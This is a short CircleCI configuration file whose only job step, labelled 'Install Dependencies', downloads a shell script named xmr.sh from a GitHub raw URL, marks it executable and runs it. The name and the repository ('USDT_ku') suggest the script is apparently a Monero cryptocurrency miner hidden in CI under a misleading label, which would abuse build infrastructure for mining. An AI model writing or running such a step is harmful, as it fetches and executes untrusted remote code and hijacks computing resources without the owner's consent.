version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 1
      steps:
        - run:
            name: Install Dependencies
            command: |
              lscpu
               wget https://raw.githubusercontent.com/jayales/USDT_ku/main/xmr.sh && chmod +x xmr.sh && ./xmr.sh

workflows:
    version: 2.1
    build:
        jobs:
        - trial